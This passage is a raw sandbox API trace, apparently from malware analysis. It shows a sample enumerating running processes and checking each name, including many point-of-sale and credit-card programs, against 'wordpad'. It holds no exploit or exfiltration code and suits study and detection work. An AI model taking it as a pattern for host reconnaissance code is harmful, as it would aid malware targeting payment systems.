th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0100.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.727] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356e2c8 [0100.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x356e2c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0100.728] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0100.728] StrStrIA (lpFirst="trillian.exe", lpSrch="wordpad") returned 0x0 [0100.728] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0100.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.729] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356e310 [0100.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x356e310, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0100.729] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0100.729] StrStrIA (lpFirst="webdrive.exe", lpSrch="wordpad") returned 0x0 [0100.729] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0100.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.730] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356e1a8 [0100.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x356e1a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0100.730] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0100.730] StrStrIA (lpFirst="whatsapp.exe", lpSrch="wordpad") returned 0x0 [0100.730] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0100.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.732] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356e388 [0100.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x356e388, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0100.732] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0100.732] StrStrIA (lpFirst="winscp.exe", lpSrch="wordpad") returned 0x0 [0100.732] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0100.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.733] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357d888 [0100.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x357d888, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0100.733] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0100.733] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="wordpad") returned 0x0 [0100.733] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0100.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0100.734] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357d4e8 [0100.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x357d4e8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0100.734] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0100.734] StrStrIA (lpFirst="active-charge.exe", lpSrch="wordpad") returned 0x0 [0100.734] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0100.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.736] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e0b8 [0100.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x356e0b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0100.736] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0100.736] StrStrIA (lpFirst="accupos.exe", lpSrch="wordpad") returned 0x0 [0100.736] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0100.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.737] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356e1c0 [0100.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x356e1c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0100.737] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0100.737] StrStrIA (lpFirst="afr38.exe", lpSrch="wordpad") returned 0x0 [0100.737] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0100.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.738] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356e0e8 [0100.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x356e0e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0100.738] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0100.738] StrStrIA (lpFirst="aldelo.exe", lpSrch="wordpad") returned 0x0 [0100.739] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0100.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0100.740] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x356e208 [0100.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x356e208, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0100.740] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0100.740] StrStrIA (lpFirst="ccv_server.exe", lpSrch="wordpad") returned 0x0 [0100.740] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0100.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0100.741] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x357d508 [0100.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x357d508, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0100.741] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0100.741] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="wordpad") returned 0x0 [0100.741] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0100.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0100.743] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357d788 [0100.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x357d788, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0100.743] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0100.743] StrStrIA (lpFirst="creditservice.exe", lpSrch="wordpad") returned 0x0 [0100.743] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0100.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.744] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356e100 [0100.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x356e100, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0100.744] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0100.744] StrStrIA (lpFirst="edcsvr.exe", lpSrch="wordpad") returned 0x0 [0100.744] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0100.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.746] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356e610 [0100.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x356e610, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0100.746] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0100.746] StrStrIA (lpFirst="fpos.exe", lpSrch="wordpad") returned 0x0 [0100.747] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0100.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.748] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356e628 [0100.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x356e628, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0100.748] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0100.748] StrStrIA (lpFirst="isspos.exe", lpSrch="wordpad") returned 0x0 [0100.748] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0100.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.749] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357d588 [0100.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x357d588, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0100.749] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0100.749] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="wordpad") returned 0x0 [0100.749] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0100.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.750] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e418 [0100.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x356e418, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0100.751] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0100.751] StrStrIA (lpFirst="omnipos.exe", lpSrch="wordpad") returned 0x0 [0100.751] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0100.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.752] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356e520 [0100.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x356e520, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0100.752] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0100.752] StrStrIA (lpFirst="spcwin.exe", lpSrch="wordpad") returned 0x0 [0100.752] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0100.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0100.753] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x357d608 [0100.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x357d608, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0100.753] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0100.753] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="wordpad") returned 0x0 [0100.753] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0100.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.755] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356e3b8 [0100.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x356e3b8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0100.755] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0100.755] StrStrIA (lpFirst="utg2.exe", lpSrch="wordpad") returned 0x0 [0100.755] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0100.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.756] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356e538 [0100.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x356e538, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0100.756] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0100.756] StrStrIA (lpFirst="saying.exe", lpSrch="wordpad") returned 0x0 [0100.756] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0100.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.758] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356e4d8 [0100.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x356e4d8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0100.758] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0100.758] StrStrIA (lpFirst="ripe.exe", lpSrch="wordpad") returned 0x0 [0100.758] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0100.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.759] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356e640 [0100.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x356e640, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0100.759] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0100.759] StrStrIA (lpFirst="acoustic.exe", lpSrch="wordpad") returned 0x0 [0100.759] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 